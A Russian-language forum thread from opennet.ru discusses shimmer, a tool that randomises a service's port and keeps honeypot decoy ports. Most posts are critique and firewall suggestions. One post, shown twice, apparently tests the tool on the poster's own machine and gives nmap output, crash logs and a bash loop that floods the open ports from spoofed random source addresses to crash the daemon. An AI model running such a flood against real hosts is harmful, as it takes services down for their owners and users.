forum.opennet.ru

Форум Разговоры, обсуждение новостей
Вариант для распечатки		Пред. тема \| След. тема
Режим отображения отдельной подветви беседы		[ Отслеживать ]

Оглавление

OpenNews: Повышение безопасности, через случайную генерацию номера порта, opennews (??), 09-Янв-08, (0) [смотреть все]

Ыыыыыыы дибилы DoS через connect на эти пустышки, все ресурсы уйду, pavlinux (??), 01:25 , 09-Янв-08, (1) //

Ну почему сразу дебилы , эти порты можно перебросить на одиноко стоящий под сто, DEC (??), 01:35 , 09-Янв-08, (2) //

Ето Павлинух Он высказывается по любому поводу , ЩекнИтрч (?), 10:30 , 09-Янв-08, (13) //

Нате демоны, жрите --------------------------nmap -sSRV host -p 1025-65535 вс, pavlinux (??), 04:50 , 10-Янв-08, (23)

Ну да, назови 10 отличий от DoS через коннект на один порт с реальным сервисом , Гость (?), 16:29 , 09-Янв-08, (19) //

не отзалупы надо давать, а на фаырволе tcp-reset , pavlinux (??), 04:52 , 10-Янв-08, (24)

TLS всех спасет , serg1224 (ok), 02:03 , 09-Янв-08, (3)
Таки не хочет народ использовать сертификаты для аутентификации , usr (?), 02:33 , 09-Янв-08, (4) //

Они не знают о их существовании, вот и придумывают всякую фигню , rootirk (?), 03:56 , 09-Янв-08, (5) //

заместо того чтобы начинать хаять проект сами чтото подобное сделайте в своём пр, Чингиз (?), 04:15 , 09-Янв-08, (6) //

Лучше всё-таки быть умным и грамотным, чем как все , Junior (ok), 06:44 , 09-Янв-08, (7)
и делаем не в своих, но в чужие код контрибутим , usr (?), 08:44 , 09-Янв-08, (9)

бредовая затея SYN, SYN ACK и та сторона считает что tcp-соединение установлено, Аноним (8), 08:22 , 09-Янв-08, (8)
a est idea kak etu shtuku cherez firewall pustit esli port random , k (??), 09:32 , 09-Янв-08, (10) //

Если подключение будет происходить с известных заранее адресов,то разрешить с ни, Junior (ok), 09:45 , 09-Янв-08, (11) //

А если соединения приходят с заранее известных ip - то безопасность чего мы улуч, mt (??), 11:17 , 09-Янв-08, (14) //

Первое Ответ был на конкретный вопрос о способе пропуска через firewall Второе , Junior (ok), 11:40 , 09-Янв-08, (16)
tochno esli IP izvesten to na xren nuzhen random port esli firewall puskaet, k (??), 13:47 , 09-Янв-08, (17)

А если легитимный IP - это NAT За NAT-ом сидит подсетка, где всегда найдутся дол, Junior (ok), 16:22 , 09-Янв-08, (18)

Если легитимный IP это нат - то все равно диапазон портов открыт - легитимный же, mt (??), 16:39 , 09-Янв-08, (20)

Таки да, но тогда получится, что кроме login-password будет ещё одна переменная , Junior (ok), 17:32 , 09-Янв-08, (22)

кстати, да сочетание connlimit recent TARPIT решит массу проблем при превышении , Аноним (-), 17:19 , 09-Янв-08, (21)

Интересно, что они там курят Додуматься до такого - это т е мало зн, vbv (ok), 10:10 , 09-Янв-08, (12) //

эт точно, можно еще и маки генерить чушь, Hammer (ok), 11:27 , 09-Янв-08, (15)

это всё бред самая крутая защита это чтобы фаервол открывал соединения на 22пор, Exe (?), 06:10 , 10-Янв-08, (25) //

метод называется portknocking , Аноним (-), 21:43 , 10-Янв-08, (28) //

И по крутости его уже тоже апгрейдили, см SPA Single Packet Authorization , Michael Shigorin (ok), 18:29 , 18-Окт-08, (32)

Лично я не понял, как клиент сможет узнать, на какой порт ему коннектиться в дан, Дмитрий Ю. Карпов (?), 15:33 , 10-Янв-08, (26) //

а vpn реализовать через ssh-туннель а вообще - забавный ход но бесполезный, myatz (?), 15:58 , 11-Янв-08, (30)

Не дочитали друзья мои, есть shimmerd который вешается на сервер, а есть shimmer, raver (??), 17:32 , 10-Янв-08, (27) //

эта система - потенциальный DoS , Аноним (-), 21:48 , 10-Янв-08, (29)

Я уже долгое время пытаюсь настроить FlyLinkDC , но у меня ничего не выходит , Gnom 3000 (?), 10:37 , 19-Май-08, (31)

Сообщения [Сортировка по времени | RSS]

1. "Повышение безопасности, через случайную генерацию номера порта" +/–

Сообщение от pavlinux (??), 09-Янв-08, 01:25

> Остальные порты выступают в в роли "honeypot" пустышек,
> постоянно выдающих ошибку аутентификации.
Ыыыыыыы дибилы.............. DoS через connect на эти пустышки,
все ресурсы уйдут на выдачу ошибки аутентификации.
:)

Ответить | Правка | Наверх | Cообщить модератору

2. "Повышение безопасности, через случайную генерацию номера пор..." +/–

Сообщение от DEC (??), 09-Янв-08, 01:35

Ну почему сразу "дебилы", эти порты можно перебросить на одиноко стоящий под столом хонипот, которому будет по барабану досят его или нет, а нужный порт перекидывать на нужную телегу.

Ответить | Правка | Наверх | Cообщить модератору

13. "Повышение безопасности, через случайную генерацию номера пор..." +/–

Сообщение от ЩекнИтрч (?), 09-Янв-08, 10:30

Ето Павлинух. Он высказывается по любому поводу.

Ответить | Правка | Наверх | Cообщить модератору

23. "Повышение безопасности, через случайную генерацию номера пор..." +/–

Сообщение от pavlinux (??), 10-Янв-08, 04:50

Нате демоны, жрите...
--------------------------
nmap -sSRV host -p 1025-65535 все порты светятся как tcpwrapped
PORT      STATE SERVICE     VERSION
50354/tcp open  tcpwrapped
50744/tcp open  tcpwrapped
50882/tcp open  tcpwrapped
51102/tcp open  tcpwrapped
51344/tcp open  tcpwrapped
51445/tcp open  tcpwrapped

А это уже первый признак, рандом расспределения какой-то х..нёй...
------------------
В даун при SYN атаке.
toshka:/test/shimmer # ./shimmerd --config=shimmer.conf
Use of uninitialized value in substitution (s///) at ./shimmerd line 626.
Use of uninitialized value in substitution (s///) at ./shimmerd line 626.
Use of uninitialized value in substitution (s///) at ./shimmerd line 626.
Use of uninitialized value in substitution (s///) at ./shimmerd line 626.
------------------
В даун при TCP connect() атаке. c фэйк адресом 0.0.0.0
toshka:/test/shimmer # ./shimmerd --config=shimmer.conf
Use of uninitialized value in subroutine entry at
/usr/lib/perl5/5.8.8/x86_64-linux-thread-multi/Socket.pm line 370.
Bad arg length for Socket::unpack_sockaddr_in, length is 0, should be 16 at
/usr/lib/perl5/5.8.8/x86_64-linux-thread-multi/Socket.pm line 370.
-----------------
При запуске из скрипта, который поднимает демон при падении...
не закрытые порты орут:
...
Thu Jan 10 04:41:59 2008: Failed to get handle for port 53374
Thu Jan 10 04:41:59 2008: Failed to get handle for port 58630
Thu Jan 10 04:41:59 2008: Failed to get handle for port 56368
Thu Jan 10 04:41:59 2008: Failed to get handle for port 53253
....
Кстати в конфиге указано ports = 50000-51000
--------------------------
После этой хрени, вся подсеть была BLACKLISTED :)
#!/bin/bash
for ((; ;))
   do
RAND_1=`echo "$RANDOM % 255" | bc`
RAND_2=`echo "$RANDOM % 255" | bc`
SRC="192.168.$RAND_1.$RAND_2"
PORTS=$(nmap -n -sSRV 192.168.1.2 -p 1025-65354 | grep tcpwrapped | tr "/" " " | awk '{printf $1" "}')
for i in $PORTS
     do
       echo "SRC = $SRC, PORT = $i"
       nmap -n -sT  192.168.1.2 -p $i -g 80 -S $SRC -e eth0 -P0 --data-length 0 --badsum
done
done
-----------

Сhao, я спать...

Ответить | Правка | Наверх | Cообщить модератору

19. "Повышение безопасности, через случайную генерацию номера пор..." +/–

Сообщение от Гость (?), 09-Янв-08, 16:29

Ну да, назови 10 отличий от DoS через коннект на один порт с реальным сервисом. Кроме того, что на пустышках висит гораздо более легковесный сервис, который только отдает отлупы?
Откуда, блин, повылезало столько детей?

Ответить | Правка | К родителю #1 | Наверх | Cообщить модератору

24. "Повышение безопасности, через случайную генерацию номера пор..." +/–

Сообщение от pavlinux (??), 10-Янв-08, 04:52

не отзалупы надо давать, а на фаырволе tcp-reset

Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру

1. "Повышение безопасности, через случайную генерацию номера порта"	+/–
Сообщение от pavlinux (??), 09-Янв-08, 01:25
> Остальные порты выступают в в роли "honeypot" пустышек, > постоянно выдающих ошибку аутентификации. Ыыыыыыы дибилы.............. DoS через connect на эти пустышки, все ресурсы уйдут на выдачу ошибки аутентификации. :)
Ответить \| Правка \| Наверх \| Cообщить модератору


	2. "Повышение безопасности, через случайную генерацию номера пор..."	+/–
	Сообщение от DEC (??), 09-Янв-08, 01:35
	Ну почему сразу "дебилы", эти порты можно перебросить на одиноко стоящий под столом хонипот, которому будет по барабану досят его или нет, а нужный порт перекидывать на нужную телегу.
	Ответить \| Правка \| Наверх \| Cообщить модератору


	13. "Повышение безопасности, через случайную генерацию номера пор..."	+/–
	Сообщение от ЩекнИтрч (?), 09-Янв-08, 10:30
	Ето Павлинух. Он высказывается по любому поводу.
	Ответить \| Правка \| Наверх \| Cообщить модератору


	23. "Повышение безопасности, через случайную генерацию номера пор..."	+/–
	Сообщение от pavlinux (??), 10-Янв-08, 04:50
	Нате демоны, жрите... -------------------------- nmap -sSRV host -p 1025-65535 все порты светятся как tcpwrapped PORT STATE SERVICE VERSION 50354/tcp open tcpwrapped 50744/tcp open tcpwrapped 50882/tcp open tcpwrapped 51102/tcp open tcpwrapped 51344/tcp open tcpwrapped 51445/tcp open tcpwrapped А это уже первый признак, рандом расспределения какой-то х..нёй... ------------------ В даун при SYN атаке. toshka:/test/shimmer # ./shimmerd --config=shimmer.conf Use of uninitialized value in substitution (s///) at ./shimmerd line 626. Use of uninitialized value in substitution (s///) at ./shimmerd line 626. Use of uninitialized value in substitution (s///) at ./shimmerd line 626. Use of uninitialized value in substitution (s///) at ./shimmerd line 626. ------------------ В даун при TCP connect() атаке. c фэйк адресом 0.0.0.0 toshka:/test/shimmer # ./shimmerd --config=shimmer.conf Use of uninitialized value in subroutine entry at /usr/lib/perl5/5.8.8/x86_64-linux-thread-multi/Socket.pm line 370. Bad arg length for Socket::unpack_sockaddr_in, length is 0, should be 16 at /usr/lib/perl5/5.8.8/x86_64-linux-thread-multi/Socket.pm line 370. ----------------- При запуске из скрипта, который поднимает демон при падении... не закрытые порты орут: ... Thu Jan 10 04:41:59 2008: Failed to get handle for port 53374 Thu Jan 10 04:41:59 2008: Failed to get handle for port 58630 Thu Jan 10 04:41:59 2008: Failed to get handle for port 56368 Thu Jan 10 04:41:59 2008: Failed to get handle for port 53253 .... Кстати в конфиге указано ports = 50000-51000 -------------------------- После этой хрени, вся подсеть была BLACKLISTED :) #!/bin/bash for ((; ;)) do RAND_1=`echo "$RANDOM % 255" \| bc` RAND_2=`echo "$RANDOM % 255" \| bc` SRC="192.168.$RAND_1.$RAND_2" PORTS=$(nmap -n -sSRV 192.168.1.2 -p 1025-65354 \| grep tcpwrapped \| tr "/" " " \| awk '{printf $1" "}') for i in $PORTS do echo "SRC = $SRC, PORT = $i" nmap -n -sT 192.168.1.2 -p $i -g 80 -S $SRC -e eth0 -P0 --data-length 0 --badsum done done ----------- Сhao, я спать...
	Ответить \| Правка \| Наверх \| Cообщить модератору


	19. "Повышение безопасности, через случайную генерацию номера пор..."	+/–
	Сообщение от Гость (?), 09-Янв-08, 16:29
	Ну да, назови 10 отличий от DoS через коннект на один порт с реальным сервисом. Кроме того, что на пустышках висит гораздо более легковесный сервис, который только отдает отлупы? Откуда, блин, повылезало столько детей?
	Ответить \| Правка \| К родителю #1 \| Наверх \| Cообщить модератору


	24. "Повышение безопасности, через случайную генерацию номера пор..."	+/–
	Сообщение от pavlinux (??), 10-Янв-08, 04:52
	не отзалупы надо давать, а на фаырволе tcp-reset
	Ответить \| Правка \| Наверх \| Cообщить модератору